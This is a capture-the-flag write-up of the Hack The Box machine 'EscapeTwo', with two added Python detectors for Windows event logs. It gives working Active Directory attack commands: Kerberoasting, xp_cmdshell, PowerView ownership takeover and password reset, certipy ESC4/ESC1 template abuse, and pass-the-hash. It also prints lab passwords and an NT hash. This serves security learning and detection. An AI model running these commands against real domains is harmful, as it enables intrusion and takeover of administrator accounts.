Machine Name    Difficulty    Date Started    Date Completed
EscapeTwo       Easy          13/01/2025      13/01/2025


Learning Points:

  • Exploiting WriteOwner Permission

Attack Path:

  1. Enumerate SMB shares and find compressed .xlsx files.
  2. Extract the files and find the password for the sa user, which can be used to log into MSSQL.
  3. Log into MSSQL, enable xp_cmdshell, and get a reverse shell.
  4. Enumerate and find the password for the ryan user, log in using Evil-WinRM, and obtain the user flag.
  5. Enumerate BloodHound data and discover that ryan has WriteOwner access to the ca_svc account.
  6. Abuse this permission to gain full control of the ca_svc account and change the user’s password.
  7. Find a vulnerable certificate from ca_svc and identify an ESC4-vulnerable template.
  8. Exploit the vulnerability and modify the template to make it ESC1-vulnerable.
  9. Use the vulnerable certificate to impersonate the administrator by exploiting both the ESC4 and ESC1 vulnerabilities, obtaining the administrator’s hash.
  10. Use impacket-psexec to get a shell as NT AUTHORITY\SYSTEM and retrieve the root flag.

Activity Log:

  • Ran a BloodHound Python scan using provided credentials.
  • Identified two kerberoastable users from BloodHound data.
  • Used impacket-GetUserSPNs to request hashes and was successful.
  • Attempted to crack the hash with Hashcat but failed.
  • Tried enumerating certificates using the Rose user but found nothing.
  • Enumerated BloodHound for more interesting paths.
  • Enumerated SMB shares and found a readable share named “Accounting Department.”
  • Downloaded two .xlsx files from the share, but they appeared corrupted in LibreOffice.
  • Extracted the .xlsx files using Archive Manager and found credentials.
  • Checked the users using SMB and found the oscar user to be valid.
  • Logged into MSSQL using sa credentials and enabled xp_cmdshell.
  • Executed a reverse shell and got a shell as sequel\sql_svc.
  • Found the credentials for user ryan and used password spray to confirm login.
  • Obtained the user flag from the ryan account.
  • Privilege escalation: Found that ryan had WriteOwner permission over the ca_svc user.
  • Used PowerView module to change the ownership of ca_svc to ryan.
  • Granted ryan full control permissions over the ca_svc account.
  • Changed the password of the ca_svc account to 'Password9999'.
  • Used certipy-ad to search for vulnerable certificate templates for ca_svc.
  • Identified the DunderMifflinAuthentication template as vulnerable to ESC4.
  • Modified the template configuration to allow domain users to enroll and exploit ESC1.
  • Requested the vulnerable certificate, impersonating the administrator user.

Default Nmap scan:

# Nmap 7.94SVN scan initiated Sun Jan 12 21:23:57 2025 as: /usr/lib/nmap/nmap -sC -sV -Pn -oA default 10.10.11.51
Nmap scan report for 10.10.11.51
Host is up (0.33s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-12 15:54:24Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-12T15:55:46+00:00; -1s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-12T15:55:46+00:00; 0s from scanner time.
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.11.51:1433: 
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ms-sql-info: 
|   10.10.11.51:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2025-01-12T15:55:46+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-12T14:55:49
|_Not valid after:  2055-01-12T14:55:49
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-12T15:55:46+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-12T15:55:46+00:00; 0s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-01-12T15:55:07
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 12 21:25:56 2025 -- 1 IP address (1 host up) scanned in 119.00 seconds

Since this was an assumed-breach scenario, we were provided with low-privileged credentials.

10.10.11.51 -u rose -p KxEPkKe6R8su

We ran a BloodHound Python scan using the credentials we had.

From the BloodHound data, we were able to see that two users were kerberoastable.

Used impacket-GetUserSPNs to request the hashes and was successful.

impacket-GetUserSPNs -dc-ip 10.10.11.51 SEQUEL.HTB/rose -request

Tried to crack the hashes with Hashcat but failed.

Tried enumerating vulnerable certificate templates as the rose user but found nothing.

certipy-ad find -u 'ROSE'@SEQUEL.HTB -p KxEPkKe6R8su -dc-ip 10.10.11.51 -stdout -vulnerable

Enumerated BloodHound for more interesting paths.

Enumerated SMB shares and was able to see a readable share named “Accounting Department.”

Found two .xlsx files and downloaded them to our machine (eagle).

Opening the files in LibreOffice reported them as corrupted.

Using the Archive Manager, we were able to extract the .xlsx files.

While enumerating the files, we were able to find credentials.

angela::0fwz7Q4mSpurIt99
oscar:oscar@sequel.htb:86LxLBMgEWaKUnBG
kevin:kevin@sequel.htb:Md9Wlq1E5bZnVDVo
sa:sa@sequel.htb:MSSQLP@ssw0rd!

Checked the users using SMB and was able to see that only the oscar user was valid.

oscar:86LxLBMgEWaKUnBG

The credentials of the user sa worked to log in to MSSQL.

Enabled xp_cmdshell with the enable_xp_cmdshell command and could then execute system commands.

Got a shell on the machine as sequel\sql_svc after executing a reverse shell.

While enumerating, we found a credential.

Using a password spray, we confirmed that it was the user ryan’s password, logged into the machine, and obtained the user flag.

Privilege Escalation

Looking at the BloodHound graph, the user ryan had WriteOwner permission over the ca_svc user.

Imported the PowerView module.

Import-Module .\PowerView.ps1

Changed the ownership of the ca_svc account to the user ryan.

Set-DomainObjectOwner -Identity 'ca_svc' -OwnerIdentity 'ryan'

Granted full control permissions (All rights) to ryan over the ca_svc account.

Add-DomainObjectAcl -Rights 'All' -TargetIdentity "ca_svc" -PrincipalIdentity "ryan"

Changed the password of the ca_svc account to 'Password9999'.

$NewPassword = ConvertTo-SecureString 'Password9999' -AsPlainText -Force
Set-DomainUserPassword -Identity 'ca_svc' -AccountPassword $NewPassword
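From the defender's side, this is an added detection example (not part of the original write-up) that correlates the chain just shown, a rewrite of an account's security descriptor followed by a password reset of that account by the same principal, from Windows Security events 5136 and 4724. It assumes Directory Service Changes auditing with a SACL on user objects; the sample records and the trusted-principal set are constructed for the demo.

```python
from datetime import datetime, timedelta

# Constructed sample events (flattened, SIEM-style) modelled on Windows Security
# event 5136 (directory service object modified) and 4724 (password reset).
SAMPLE_EVENTS = [
    {"time": "2025-01-13T10:01:00", "id": 5136, "subject": "SEQUEL\\ryan",
     "attr": "nTSecurityDescriptor", "object": "CN=ca_svc,CN=Users,DC=sequel,DC=htb"},
    {"time": "2025-01-13T10:01:30", "id": 5136, "subject": "SEQUEL\\ryan",
     "attr": "nTSecurityDescriptor", "object": "CN=ca_svc,CN=Users,DC=sequel,DC=htb"},
    {"time": "2025-01-13T10:02:10", "id": 4724, "subject": "SEQUEL\\ryan",
     "target": "ca_svc"},
    # Benign: a helpdesk reset that was not preceded by an ACL change.
    {"time": "2025-01-13T11:00:00", "id": 4724, "subject": "SEQUEL\\helpdesk",
     "target": "oscar"},
]

# Principals expected to rewrite ACLs and reset passwords (assumption for the demo).
TRUSTED_SUBJECTS = {"SEQUEL\\Administrator", "SEQUEL\\helpdesk"}


def _cn(dn):
    """'CN=ca_svc,CN=Users,...' -> 'ca_svc'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def find_acl_takeover_chains(events, window=timedelta(minutes=30),
                             trusted=TRUSTED_SUBJECTS):
    """Return (subject, target) pairs where an untrusted subject rewrote the
    security descriptor (owner/DACL) of an account and then reset that
    account's password within `window`: the WriteOwner abuse pattern above."""
    acl_changes = [e for e in events
                   if e["id"] == 5136 and e.get("attr") == "nTSecurityDescriptor"]
    hits = []
    for reset in (e for e in events if e["id"] == 4724):
        if reset["subject"] in trusted:
            continue
        for change in acl_changes:
            gap = datetime.fromisoformat(reset["time"]) - datetime.fromisoformat(change["time"])
            if (change["subject"] == reset["subject"]
                    and _cn(change["object"]).lower() == reset["target"].lower()
                    and timedelta(0) <= gap <= window):
                hits.append((reset["subject"], reset["target"]))
                break
    return hits


if __name__ == "__main__":
    for subject, target in find_acl_takeover_chains(SAMPLE_EVENTS):
        print(f"ALERT: {subject} rewrote the ACL of {target}, then reset its password")
```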

We used certipy-ad to search for vulnerable certificate templates as the ca_svc user on the SEQUEL.HTB domain and saw that the DunderMifflinAuthentication template was vulnerable to ESC4.

certipy-ad find -u 'ca_svc'@SEQUEL.HTB -p Password9999 -dc-ip 10.10.11.51 -stdout -vulnerable

Using Certipy, we modified the template's configuration so that domain users could enroll in it and impersonate any user, which made it exploitable via ESC1.

root@eagle:~/HTB/Seasonal/Windows/EscapeTwo# certipy-ad template -u ca_svc -target sequel.vl -dc-ip 10.10.11.51 -template DunderMifflinAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)

Password:
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'

Now, we were able to exploit this as an ESC1 certificate vulnerability.

We requested the vulnerable certificate, impersonating the administrator user.

root@eagle:~/HTB/Seasonal/Windows/EscapeTwo/cert# certipy-ad req -u 'ca_svc' -p Password9999 -dc-ip 10.10.11.51 -ca sequel-DC01-CA -template DunderMifflinAuthentication -upn administrator -target dc01.sequel.vl -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 30
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
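As an added defensive example (not from the original write-up), the following correlates the two steps above: a template's msPKI-Certificate-Name-Flag being written with CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set (Security event 5136), and a certificate then issued from that template (CA event 4887) whose SAN UPN names a different account than the requester. The records are constructed samples, and the san_upn field assumes the log pipeline has parsed the issued certificate's SAN.

```python
# Bit of msPKI-Certificate-Name-Flag that lets the enrollee supply the subject/SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1
TEMPLATE_CONTAINER = "CN=Certificate Templates,CN=Public Key Services,"

# Constructed samples modelled on Security event 5136 (directory object modified)
# and CA event 4887 (certificate issued); san_upn assumes the SAN was parsed.
SAMPLE_EVENTS = [
    {"id": 5136, "subject": "SEQUEL\\ca_svc", "attr": "msPKI-Certificate-Name-Flag",
     "value": "1", "object": "CN=DunderMifflinAuthentication," + TEMPLATE_CONTAINER
     + "CN=Services,CN=Configuration,DC=sequel,DC=htb"},
    {"id": 4887, "requester": "SEQUEL\\ca_svc", "template": "DunderMifflinAuthentication",
     "san_upn": "administrator@sequel.htb"},
    # Benign: a user enrolling for a certificate in their own name.
    {"id": 4887, "requester": "SEQUEL\\oscar", "template": "User",
     "san_upn": "oscar@sequel.htb"},
]


def templates_made_enrollee_supplies_subject(events):
    """Template name -> principal that set ENROLLEE_SUPPLIES_SUBJECT on it (ESC4 step)."""
    weakened = {}
    for e in events:
        if (e["id"] == 5136 and e.get("attr") == "msPKI-Certificate-Name-Flag"
                and TEMPLATE_CONTAINER in e["object"]
                and int(e["value"]) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT):
            template = e["object"].split(",", 1)[0].split("=", 1)[1]
            weakened[template] = e["subject"]
    return weakened


def find_impersonation_issuances(events):
    """(requester, san_upn, template) for certs whose SAN UPN is not the requester (ESC1 step)."""
    hits = []
    for e in events:
        if e["id"] != 4887:
            continue
        requester_sam = e["requester"].split("\\")[-1].lower()
        san_user = e["san_upn"].split("@", 1)[0].lower()
        if requester_sam != san_user:
            hits.append((e["requester"], e["san_upn"], e["template"]))
    return hits


def find_esc4_to_esc1_chains(events):
    """(modifier, requester, san_upn, template): impersonation via a freshly weakened template."""
    weakened = templates_made_enrollee_supplies_subject(events)
    return [(weakened[t], req, upn, t)
            for req, upn, t in find_impersonation_issuances(events) if t in weakened]
```

Running find_esc4_to_esc1_chains(SAMPLE_EVENTS) flags the ca_svc issuance for administrator and ignores oscar's self-enrollment.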

Then, we were able to retrieve the administrator’s NT hash by authenticating with the exported certificate.

root@eagle:~/HTB/Seasonal/Windows/EscapeTwo/cert# certipy-ad auth -pfx 'administrator.pfx' -username 'administrator' -domain 'sequel.htb' -dc-ip 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff

We were able to perform a pass-the-hash attack using Evil-WinRM, log into the machine, and obtain the root flag.